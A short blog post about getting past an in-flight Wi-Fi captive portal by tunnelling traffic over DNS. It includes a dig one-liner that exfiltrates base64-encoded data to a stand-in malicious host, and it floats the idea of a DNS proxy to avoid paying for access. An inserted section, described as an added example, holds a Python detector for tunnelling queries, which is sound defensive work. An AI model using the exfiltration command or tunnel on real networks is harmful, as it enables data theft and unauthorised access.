Using DNS to bypass hotspot WiFi
──────────────────────────────────────────────────────────────────────

I took the plane yesterday, and realized that some companies now « 
offer » a free wifi service on-board, so you can access the internet 
while flying. They don't really offer anything though, as you must 
register your email address on a captive portal, and even pay a fee to 
get full internet access (instead of just « messaging apps »).

I tried to access the internet using curl(1) directly, to see if you 
could use protocols like gopher, or even smtp without registering. 
Turns out you can't.
However, I noticed that I could resolve all the hostnames I wanted! 
Which means DNS requests reach the internet without needing you to 
register on the portal. It immediately reminded me of a technique I read 
about in the past, and forgot: DNS tunneling.

DNS tunneling is usually used as a data exfiltration method in cyber 
attacks. It assumes DNS traffic goes to the internet unfiltered, so 
malware can use DNS queries to export data to an external server. For 
example:

    pl=$(echo "hidden data" | base64)
    dig +short TXT $pl @gimmedata.ns1.malicious.tld

The data can then be retrieved from the logs, or a modified DNS server 
could even reconstruct it. This is bad though, and you shouldn't do it.

However, abusing the DNS payload to send data over the internet is an 
interesting idea. Instead of exfiltrating data, you could use the 
remote DNS server as a proxy or VPN, and access the clearnet by wrapping 
all your outgoing traffic in DNS queries, which the external server 
would replay, answering via DNS replies!

It could work in theory, but has two major downsides: first, it would be 
horribly slow. The DNS payload is limited to something like 512 bytes, 
so that means fragmenting your traffic so it fits in a DNS request. 
Same for replies.
The second drawback is that it generates a lot of DNS traffic, 
potentially marking you as an attacker in the network you're trying to 
bypass, which could lead to problems.
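The exfiltration pattern from the dig example above and the second drawback (a tunnel
produces a flood of queries) are exactly what a resolver-side detector keys on. The
following is an added example, not code from the post: it scans constructed resolver
log lines for clients that repeatedly send long, high-entropy first labels to one zone.
The log format and the thresholds are assumptions to tune per network.

```python
import math
from collections import defaultdict

# Constructed sample resolver log: "client qtype qname" per line. Not from the post;
# the long first labels are base64 chunks in the style of the dig example above.
SAMPLE_LOG = """\
10.0.0.5 A www.example.com
10.0.0.5 AAAA www.example.com
10.0.0.5 A cdn.example.net
10.0.0.7 TXT aGlkZGVuIGRhdGEK.gimmedata.ns1.malicious.tld
10.0.0.7 TXT c2VjcmV0IGZpbGUgY29udGVudHM.gimmedata.ns1.malicious.tld
10.0.0.7 TXT bW9yZSBzdG9sZW4gYnl0ZXMgaGVyZQ.gimmedata.ns1.malicious.tld
10.0.0.7 TXT eWV0IGFub3RoZXIgY2h1bmsgb2YgZGF0YQ.gimmedata.ns1.malicious.tld
10.0.0.7 A mail.example.com
"""


def shannon_entropy(s):
    """Bits per character: encoded chunks score high, ordinary hostnames score low."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in (s.count(ch) for ch in set(s)))


def split_qname(qname):
    """Return (first label, rest of the name); the first label is where the dig
    example above puts its payload. Assumption: a production detector would strip
    every label above the registrable domain, since a tunnel may spread data over
    several labels."""
    first, _, rest = qname.rstrip(".").partition(".")
    return first, rest


def detect_tunneling(log_text, min_label_len=16, min_entropy=3.0, min_queries=3):
    """Flag (client, zone) pairs that repeatedly send long, high-entropy labels to
    one zone. Thresholds are assumptions, not values from the post."""
    counts = defaultdict(int)
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 3:
            continue  # skip malformed lines rather than crash on them
        client, _qtype, qname = fields
        label, zone = split_qname(qname)
        if len(label) >= min_label_len and shannon_entropy(label) >= min_entropy:
            counts[(client, zone)] += 1
    return {key: n for key, n in counts.items() if n >= min_queries}


if __name__ == "__main__":
    for (client, zone), n in detect_tunneling(SAMPLE_LOG).items():
        print(f"{client} sent {n} encoded-looking queries to {zone}")
```

On the sample log only 10.0.0.7 is flagged, with four queries to gimmedata.ns1.malicious.tld; the ordinary lookups from 10.0.0.5 fall below the label-length threshold.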

I thought it was a fun idea to explore, and I wonder if such a proxying 
method has been tested already?

Having such a DNS web proxy in your toolbox could be pretty helpful 
from time to time!
-- 
~wgs
20200926.1342